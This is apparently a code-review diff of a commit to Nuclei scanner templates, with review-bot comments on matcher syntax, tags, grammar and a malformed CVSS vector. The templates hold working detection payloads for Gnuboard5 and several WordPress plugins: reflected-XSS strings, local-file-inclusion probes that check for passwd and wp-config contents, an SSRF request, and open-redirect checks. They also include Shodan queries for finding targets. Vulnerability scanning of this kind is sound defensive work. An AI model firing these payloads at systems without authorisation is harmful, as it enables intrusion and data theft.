     10 + - https://huntr.dev/bounties/ed317cde-9bd1-429e-b6d3-547e72534dd5/
     11 + metadata:
     12 + verified: true
     13 + shodan-query: http.html:"gnuboard5"
     14 + tags: gnuboard,xss
     15 + 
     16 +requests:
     17 + - method: GET
     18 + path:
     19 + - "{{BaseURL}}/mobile/shop/lg/mispwapurl.php?LGD_OID=%3Cscript%3Ealert(document.domain)%3C/script%3E"
     20 + 
     21 + matchers-condition: and
     22 + matchers:
     23 + - type: word
     24 + words:
     25 + - 'LGD_OID = <script>alert(document.domain)</script>'
     26 + 
     27 + - type: word
     28 + part: header
     29 + words:
     30 + - text/html
     31 + 
     32 + - type: status
     33 + status:
     34 + - 200
     35 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/gnuboard/gnuboard5-xss.yaml
     1 +id: gnuboard5-xss
     2 + 
     3 +info:
     4 + name: Gnuboard5 - Cross Site Scripting
     5 + author: arafatansari
     6 + severity: medium
     7 + description: |
     8 + Gnuboard 5 is vulnerable to reflected XSS to a flaw in the clean_xss_tags() function called in new.php.
     9 + reference:
     10 + - https://huntr.dev/bounties/ad2a9b32-fe6c-43e9-9b05-2c77c58dde6a/
     11 + metadata:
     12 + verified: true
     13 + shodan-query: http.html:"gnuboard5"
     14 + tags: xss,gnuboard,gnuboard5
     15 + 
     16 +requests:
     17 + - method: GET
     18 + path:
     19 + - "{{BaseURL}}/bbs/new.php?darkmode=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
     20 + 
     21 + matchers-condition: and
     22 + matchers:
     23 + - type: word
     24 + words:
     25 + - 'header\"><script>alert(document.domain)</script>.css?'
     26 + 
     27 + - type: word
     28 + part: header
     29 + words:
     30 + - text/html
     31 + 
     32 + - type: status
     33 + status:
     34 + - 200
     35 + 
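Review bot: the matcher at line 25 is a single-quoted YAML scalar, in which `\"` is a literal backslash followed by a quote, so the template requires the response to contain `header\"><script>`; if new.php reflects a plain `"`, the word never matches. Confirm from the reference on line 10 whether the backslash is expected and, if not, write the string as `'header"><script>alert(document.domain)</script>.css?'`. The description on line 8 is also missing a word: "vulnerable to reflected XSS due to a flaw in the clean_xss_tags() function".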
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/wordpress/ad-widget-lfi.yaml
    skipped 3 lines
    4 4   name: WordPress Ad Widget 2.11.0 - Local File Inclusion
    5 5   author: 0x_Akoko
    6 6   severity: high
    7  - description: WordPress Ad Widget 2.11.0 is vulnerable to local file inclusion. Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks.
     7 + description: |
     8 + WordPress Ad Widget 2.11.0 is vulnerable to local file inclusion. Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks.
    8 9   reference:
    9 10   - https://cxsecurity.com/issue/WLB-2017100084
    10 11   - https://plugins.trac.wordpress.org/changeset/1628751/ad-widget
     12 + - https://wpscan.com/vulnerability/caca21fe-56bf-4d4c-afc8-4a218e52f0a2
    11 13   classification:
    12 14   cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    13 15   cvss-score: 7.5
    14 16   cwe-id: CWE-22
    15  - tags: wordpress,wp-plugin,lfi
     17 + tags: wordpress,wp-plugin,lfi,wp,adWidget
    16 18   
    17 19  requests:
    18 20   - method: GET
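Review bot: the new tag `adWidget` on line 17 is mixed case; every other plugin tag added in this commit (`accessmanager`, `brandfolder`, `wp`) is lowercase, so use `adwidget` to keep tag filtering consistent.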
    skipped 2 lines
    21 23   
    22 24   matchers-condition: and
    23 25   matchers:
    24  - 
    25 26   - type: regex
    26 27   regex:
    27 28   - "root:[x*]:0:0"
    skipped 7 lines
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/wordpress/advanced-access-manager-lfi.yaml
    1 1  id: advanced-access-manager-lfi
    2 2   
    3 3  info:
    4  - name: WordPress Advanced Access Manager <5.9.9 - Local File Inclusion
     4 + name: WordPress Advanced Access Manager < 5.9.9 - Local File Inclusion
    5 5   author: 0x_Akoko
    6 6   severity: high
    7  - description: WordPress Advanced Access Manager versions before 5.9.9 are vulnerable to local file inclusion and allows attackers to download the wp-config.php file and get access to the database, which is publicly reachable on many servers.
     7 + description: |
     8 + WordPress Advanced Access Manager versions before 5.9.9 are vulnerable to local file inclusion and allows attackers to download the wp-config.php file and get access to the database, which is publicly reachable on many servers.
    8 9   reference:
    9 10   - https://wpscan.com/vulnerability/9873
    10 11   - https://id.wordpress.org/plugins/advanced-access-manager/
     12 + - https://wpscan.com/vulnerability/dfe62ff5-956c-4403-b3fd-55677628036b
    11 13   classification:
    12 14   cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    13 15   cvss-score: 7.5
    14 16   cwe-id: CWE-22
    15  - tags: wordpress,wp-plugin,lfi
     17 + tags: wordpress,wp-plugin,lfi,wp,accessmanager
    16 18   
    17 19  requests:
    18 20   - method: GET
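Review bot: the description on line 8 has a subject-verb mismatch: "versions before 5.9.9 are vulnerable to local file inclusion and allows attackers" should read "and allow attackers".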
    skipped 3 lines
    22 24   matchers-condition: and
    23 25   matchers:
    24 26   - type: word
     27 + part: body
    25 28   words:
    26 29   - "DB_NAME"
    27 30   - "DB_PASSWORD"
    28  - part: body
    29 31   condition: and
    30 32   
    31 33   - type: status
    skipped 5 lines
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/wordpress/brandfolder-open-redirect.yaml
    1 1  id: brandfolder-open-redirect
    2 2   
    3 3  info:
    4  - name: WordPress Brandfolder - Remote/Local File Inclusion
     4 + name: WordPress Brandfolder - Open Redirect (RFI & LFI)
    5 5   author: 0x_Akoko
    6  - severity: low
    7  - description: WordPress Brandfolder is vulnerable to remote/local file inclusion and allows remote attackers to inject an arbitrary URL into the 'callback.php' endpoint via the 'wp_abspath' parameter which will redirect the victim to it.
     6 + severity: medium
     7 + description: |
     8 + WordPress Brandfolder is vulnerable to remote/local file inclusion and allows remote attackers to inject an arbitrary URL into the 'callback.php' endpoint via the 'wp_abspath' parameter which will redirect the victim to it.
    8 9   reference:
    9 10   - https://www.exploit-db.com/exploits/39591
    10  - tags: wordpress,wp-plugin,lfi,rfi
     11 + - https://wpscan.com/vulnerability/f850e182-f9c6-4264-b2b1-e587447fe4b1
     12 + tags: wordpress,wp-plugin,lfi,rfi,redirect,wp,brandfolder
    11 13   
    12 14  requests:
    13 15   - method: GET
    skipped 2 lines
    16 18   
    17 19   matchers:
    18 20   - type: regex
     21 + part: header
    19 22   regex:
    20 23   - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
    21  - part: header
    22 24   
    23 25  # Enhanced by mp on 2022/08/01
    24 26   
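Review bot: the name on line 4 is now "Open Redirect (RFI & LFI)" and the severity on line 6 was raised to medium, but the only matcher (lines 20-23) checks a `Location` header pointing at interact.sh, which confirms the redirect and says nothing about file inclusion, while the description on line 8 still opens with "vulnerable to remote/local file inclusion". Either narrow the description and the `lfi,rfi` tags on line 12 to what the template actually verifies, or add a matcher that substantiates the inclusion claim.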
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/wordpress/eatery-restaurant-open-redirect.yaml
    1 1  id: eatery-restaurant-open-redirect
    2 2   
    3 3  info:
    4  - name: WordPress Attitude Themes 1.1.1 Open Redirection
     4 + name: WordPress Eatery Restaurant Themes < 2.2 - Open Redirection
    5 5   author: 0x_Akoko
    6 6   severity: low
    7  - description: The WordPress Attitude Themes allows remote attackers to redirect users to an attacker controlled URL.
     7 + description: |
     8 + WordPress Eatery Restaurant Themes 2.2 accepts a user-controlled input that specifies a link to an external site, and uses that link in a Redirect
    8 9   reference:
    9 10   - https://cxsecurity.com/issue/WLB-2020030183
    10  - tags: wordpress,wp-theme,redirect
     11 + tags: wordpress,wp-theme,redirect,wp
    11 12   
    12 13  requests:
    13 14   - method: GET
    skipped 2 lines
    16 17   
    17 18   matchers:
    18 19   - type: regex
     20 + part: header
    19 21   regex:
    20 22   - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
    21  - part: header
    22 23   
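Review bot: the name on line 4 says "< 2.2" but the description on line 8 says version 2.2 itself is affected; the two disagree, and the reference on line 10 should settle which is right. The description also lacks a terminal period.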
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/wordpress/nativechurch-wp-theme-lfd.yaml
    skipped 3 lines
    4 4   name: WordPress NativeChurch Theme - Local File Inclusion
    5 5   author: 0x_Akoko
    6 6   severity: high
    7  - description: WordPress NativeChurch Theme is vulnerable to local file inclusion in the download.php file.
     7 + description: |
     8 + WordPress NativeChurch Theme is vulnerable to local file inclusion in the download.php file.
    8 9   reference:
    9 10   - https://packetstormsecurity.com/files/132297/WordPress-NativeChurch-Theme-1.0-1.5-Arbitrary-File-Download.html
    10  - tags: wordpress,wp-theme,lfi
     11 + - https://wpscan.com/vulnerability/2e1062ed-0c48-473f-aab2-20ac9d4c72b1
     12 + tags: wordpress,wp-theme,lfi,wp
    11 13   
    12 14  requests:
    13 15   - method: GET
    skipped 3 lines
    17 19   matchers-condition: and
    18 20   matchers:
    19 21   - type: word
     22 + part: body
    20 23   words:
    21 24   - "DB_NAME"
    22 25   - "DB_PASSWORD"
    23 26   - "DB_HOST"
    24 27   - "The base configurations of the WordPress"
    25  - part: body
    26 28   condition: and
    27 29   
    28 30  # Enhanced by mp on 2022/07/29
    skipped 1 lines
  • ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/wordpress/sassy-social-share.yaml
    skipped 3 lines
    4 4   name: Sassy Social Share <= 3.3.3 - Cross-Site Scripting
    5 5   author: Random_Robbie
    6 6   severity: medium
    7  - tags: wordpress,wp-plugin,sassy,xss
     7 + description: |
     8 + AJAX endpoints which returns JSON data has no Content-Type header set, and uses default text/html. Any JSON that has HTML will be rendered as such.
     9 + reference:
     10 + - https://wpscan.com/vulnerability/4631519b-2060-43a0-b69b-b3d7ed94c705
     11 + tags: wordpress,wp-plugin,sassy,xss,wp
    8 12   
    9 13  requests:
    10 14   - method: GET
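Review bot: the description on line 8 has two agreement errors: "AJAX endpoints which returns JSON data has no Content-Type header set" should read "AJAX endpoints which return JSON data have no Content-Type header set".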
    skipped 19 lines
    30 34   - type: status
    31 35   status:
    32 36   - 200
     37 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/wordpress/w3c-total-cache-ssrf.yaml
    1 1  id: w3c-total-cache-ssrf
    2 2   
    3 3  info:
    4  - name: Wordpress W3C Total Cache SSRF <= 0.9.4
     4 + name: Wordpress W3C Total Cache <= 0.9.4 - Server Side Request Forgery (SSRF)
    5 5   author: random_robbie
    6 6   severity: medium
    7  - description: The W3 Total Cache WordPress plugin was affected by an Unauthenticated Server Side Request Forgery (SSRF) security vulnerability.
     7 + description: |
     8 + The W3 Total Cache WordPress plugin was affected by an Unauthenticated Server Side Request Forgery (SSRF) security vulnerability.
    8 9   reference:
    9 10   - https://wpvulndb.com/vulnerabilities/8644
    10 11   - https://klikki.fi/adv/w3_total_cache.html
    11  - tags: wordpress,wp-plugin,cache,ssrf
     12 + tags: wordpress,wp-plugin,cache,ssrf,wp
    12 13   
    13 14  requests:
    14 15   - method: GET
    15 16   path:
    16 17   - '{{BaseURL}}/wp-content/plugins/w3-total-cache/pub/minify.php?file=yygpKbDS1y9Ky9TLSy0uLi3Wyy9KB3NLKkqUM4CyxUDpxKzECr30_Pz0nNTEgsxiveT8XAA.css'
     18 + 
    17 19   matchers:
    18 20   - type: word
     21 + part: body
    19 22   words:
    20 23   - "NessusFileIncludeTest"
    21  - part: body
    22 24   
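Review bot: the name on line 4 keeps "W3C Total Cache" while the description on line 8 and the plugin path on line 17 (`w3-total-cache`) refer to W3 Total Cache; "W3C" names the standards body, not this plugin. While touching the name, "Wordpress" should be "WordPress" as in the other templates.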
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/wordpress/wordpress-social-metrics-tracker.yaml
    skipped 3 lines
    4 4   name: Social Metrics Tracker <= 1.6.8 - Unauthorised Data Export
    5 5   author: randomrobbie
    6 6   severity: medium
    7  - tags: wordpress,wp-plugin
     7 + description: |
     8 + The lack of proper authorisation when exporting data from the plugin could allow unauthenticated users to get information about the posts and page of the blog, including their author's username and email.
     9 + reference:
     10 + - https://wpscan.com/vulnerability/f4eed3ba-2746-426f-b030-a8c432defeb2
     11 + tags: wordpress,wp-plugin,wp,unauth
    8 12   
    9 13  requests:
    10 14   - method: GET
    skipped 2 lines
    13 17   
    14 18   matchers-condition: and
    15 19   matchers:
    16  - - type: status
    17  - status:
    18  - - 200
    19 20   - type: word
     21 + part: body
    20 22   words:
    21 23   - "Main URL to Post"
    22  - part: body
     24 + 
     25 + - type: status
     26 + status:
     27 + - 200
     28 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml
    1 1  id: wordpress-zebra-form-xss
    2 2   
    3 3  info:
    4  - name: Wordpress Zebra Form - Cross-Site Scripting
     4 + name: Zebra_Form Library <= 2.9.8 - Cross-Site Scripting (XSS)
    5 5   author: madrobot
    6 6   severity: medium
     7 + description: |
     8 + The Zebra_Form PHP library v2.9.8 (latest) and below, used by some WordPress plugins, is affected by reflected Cross-Site Scripting issues in its process.php file.
    7 9   reference:
    8 10   - https://blog.wpscan.com/2021/02/15/zebra-form-xss-wordpress-vulnerability-affects-multiple-plugins.html
    9  - tags: wordpress,xss
     11 + - https://wpscan.com/vulnerability/e4b796fa-3215-43ff-a6aa-71f6e1db25e5
     12 + tags: wordpress,xss,wp
    10 13   
    11 14  requests:
    12 15   - raw:
    13 16   - |
    14  - POST /wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php?form=%3C/script%3E%3Cimg%20src%20onerror=alert(/XSS-form/)%3E&control=upload HTTP/1.1
     17 + POST /wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php?form=%3C/script%3E%3Cimg%20src%20onerror=alert(document.domain)%3E&control=upload HTTP/1.1
    15 18   Host: {{Hostname}}
    16 19   Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    17 20   Content-Type: multipart/form-data; boundary=---------------------------77916619616724262872902741074
    skipped 8 lines
    26 29   matchers-condition: and
    27 30   matchers:
    28 31   - type: word
     32 + part: body
    29 33   words:
    30  - - "</script><img src onerror=alert(/XSS-form/)>"
    31  - part: body
     34 + - "</script><img src onerror=alert(document.domain)>"
     35 + 
     36 + - type: word
     37 + part: header
     38 + words:
     39 + - "text/html"
    32 40   
    33 41   - type: status
    34 42   status:
    35 43   - 200
    36 44   
    37  - - type: word
    38  - words:
    39  - - "text/html"
    40  - part: header
    41  - 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/wordpress/wp-ambience-xss.yaml
    1 1  id: wp-ambience-xss
    2 2   
    3 3  info:
    4  - name: WordPress Theme Ambience - 'src' Reflected Cross-Site Scripting (XSS)
     4 + name: WordPress Theme Ambience <= 1.0 - Cross-Site Scripting (XSS)
    5 5   author: daffainfo
    6 6   severity: medium
     7 + description: |
     8 + The ambience WordPress theme was affected by a Cross-Site Scripting (XSS) security vulnerability.
    7 9   reference:
    8 10   - https://www.exploit-db.com/exploits/38568
    9  - tags: wordpress,xss,wp-plugin
     11 + - https://wpscan.com/vulnerability/c465e5c1-fe43-40e9-894a-97b8ac462381
     12 + tags: wordpress,xss,wp-plugin,wp
    10 13   
    11 14  requests:
    12 15   - method: GET
    skipped 3 lines
    16 19   matchers-condition: and
    17 20   matchers:
    18 21   - type: word
     22 + part: body
    19 23   words:
    20 24   - "<body onload=alert(1)>"
    21  - part: body
    22 25   
    23 26   - type: word
    24 27   part: header
    skipped 7 lines
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/wordpress/wp-woocommerce-email-verification.yaml
    1 1  id: wp-woocommerce-email-verification
    2 2   
    3 3  info:
    4  - name: WordPress WooCommerce <1.8.2 - Authentication Bypass
     4 + name: Email Verification for WooCommerce < 1.8.2 - Loose Comparison to Authentication Bypass
    5 5   author: random_robbie,daffianfo
    6 6   severity: critical
    7  - description: WordPress WooCommerce prior to version 1.8.2 contains a loose comparison issue which could allow any user to log in as administrator.
     7 + description: |
     8 + Email Verification for WooCommerce Wordpress plugin prior to version 1.8.2 contains a loose comparison issue which could allow any user to log in as administrator.
    8 9   reference:
    9 10   - https://wpvulndb.com/vulnerabilities/10318
     11 + - https://wpscan.com/vulnerability/0c93832c-83db-4053-8a11-70de966bb3a8
    10 12   classification:
    11 13   cvss-metrics: CVSS:10.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    12 14   cvss-score: 10.0
    13 15   cwe-id: CWE-288
    14  - tags: wordpress,wp-plugin,woocommerce
     16 + tags: wordpress,wp-plugin,woocommerce,wp
    15 17   
    16 18  requests:
    17 19   - method: GET
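Review bot: the cvss-metrics value on line 11, `CVSS:10.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H`, is malformed; the prefix is the specification version (`CVSS:3.0` or `CVSS:3.1`), not the score, which already lives in cvss-score on line 12. It is unchanged context, but this commit edits the file and the line will not parse as a CVSS vector. Also "Wordpress" on line 8 should be "WordPress".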
    skipped 25 lines
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/wordpress/wp-woocommerce-file-download.yaml
    1 1  id: wp-woocommerce-file-download
    2 2   
    3 3  info:
    4  - name: WordPress WooCommerce < 1.2.7 - Arbitrary File Retrieval
     4 + name: Product Input Fields for WooCommerce < 1.2.7 - Unauthenticated File Download
    5 5   author: 0x_Akoko
    6 6   severity: high
    7  - description: WordPress WooCommerce < 1.2.7 is susceptible to file download vulnerabilities. The lack of authorization checks in the handle_downloads() function hooked to admin_init() could allow unauthenticated
    8  - users to download arbitrary files from the blog using a path traversal payload.
    9  - reference:
     7 + description: |
     8 + WordPress WooCommerce < 1.2.7 is susceptible to file download vulnerabilities. The lack of authorization checks in the handle_downloads() function hooked to admin_init() could allow unauthenticated users to download arbitrary files from the blog using a path traversal payload.
     9 + reference: |
    10 10   - https://wpscan.com/vulnerability/15f345e6-fc53-4bac-bc5a-de898181ea74
    11 11   - https://blog.nintechnet.com/high-severity-vulnerability-fixed-in-product-input-fields-for-woocommerce/
    12 12   classification:
    13 13   cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    14 14   cvss-score: 8.6
    15 15   cwe-id: CWE-22
    16  - tags: wordpress,woocommerce,lfi
     16 + tags: wordpress,woocommerce,lfi,wp-plugin,wp
    17 17   
    18 18  requests:
    19 19   - method: GET
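Review bot: `reference: |` at line 9 turns the two entries below it into one literal multi-line string (dashes included) instead of a YAML list, so the references no longer parse as links; keep `reference:` without the block indicator as every other template here does. The name on line 4 now names "Product Input Fields for WooCommerce" but the description on line 8 still says "WordPress WooCommerce < 1.2.7"; align the description with the plugin actually affected.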
    skipped 18 lines